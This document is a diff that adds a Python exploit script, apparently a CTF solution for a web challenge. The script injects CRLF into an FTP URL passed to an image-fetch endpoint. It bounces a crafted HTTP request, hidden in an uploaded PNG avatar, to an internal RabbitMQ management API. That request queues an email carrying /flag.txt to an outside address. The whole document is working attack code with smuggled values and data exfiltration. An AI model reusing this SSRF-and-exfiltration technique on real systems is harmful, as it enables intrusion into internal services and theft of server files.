| 1 | +import requests |
| 2 | +import base64 |
| 3 | +import urllib |
| 4 | + |
| 5 | +#Joint effort by mementomori and Jazzy |
| 6 | + |
| 7 | +API_URL = 'http://contrived.pwni.ng/api' |
| 8 | +AUTH = 'e8d880e6-9b42-40e9-8b11-bc79fd6c083c' |
| 9 | + |
| 10 | +SSRF_HOST, SSRF_PORT = '172.32.56.72', 15672 |
| 11 | +SSRF_BODY = '''POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 |
| 12 | +Host: rabbit:15672 |
| 13 | +Authorization: Basic dGVzdDp0ZXN0 |
| 14 | +User-Agent: curl/7.52.1 |
| 15 | +Accept: */* |
| 16 | +Content-Length: 336 |
| 17 | +Content-Type: application/json |
| 18 | +
|
| 19 | +{"vhost": "/", "name": "amq.default", "properties": {"delivery_mode": 1, "headers": {}}, "routing_key": "email", "delivery_mode": "1", "payload": "{\\"text\\": \\"pepega\\", \\"to\\": \\"[email protected]\\", \\"attachments\\": [{\\"filename\\": \\"flag.txt\\", \\"path\\": \\"/flag.txt\\"}]}", "headers": {}, "props": {}, "payload_encoding": "string"} |
| 20 | +
|
| 21 | +'''.replace('\n', '\r\n')*800 |
| 22 | + |
| 23 | +PNG_HEADER = '\x89\x50\x4e\x47' |
| 24 | + |
| 25 | +s = requests.Session() |
| 26 | +s.cookies.update({'authentication': AUTH}) |
| 27 | + |
| 28 | +def upload_avatar(contents): |
| 29 | + r = s.post(API_URL + '/profile', json = {'image': base64.b64encode(contents)}) |
| 30 | + assert r.content == 'Profile updated' |
| 31 | + |
| 32 | +def get_uuid(): |
| 33 | + upload_avatar(PNG_HEADER) |
| 34 | + r = s.get(API_URL + '/self') |
| 35 | + return r.json()['profile'].split('/')[4] |
| 36 | + |
| 37 | +def do_ssrf(host, port, body): |
| 38 | + uuid = get_uuid() |
| 39 | + upload_avatar(PNG_HEADER + body) |
| 40 | + print uuid |
| 41 | + ftp_cmds = [ |
| 42 | + 'PORT {},{},{}'.format(host.replace('.', ','), port >> 8, port & 0xff), |
| 43 | + 'CWD user', |
| 44 | + 'CWD {}'.format(uuid), |
| 45 | + 'REST 4', |
| 46 | + 'RETR profile.png', |
| 47 | + ] |
| 48 | + url = 'ftp://anonymous%0d%0a{}:pass@ftp/'.format(urllib.quote('\r\n'.join(ftp_cmds))) |
| 49 | + r = requests.get(API_URL + '/image?url=' + urllib.quote(url)) |
| 50 | + |
| 51 | +do_ssrf(SSRF_HOST, SSRF_PORT, SSRF_BODY) |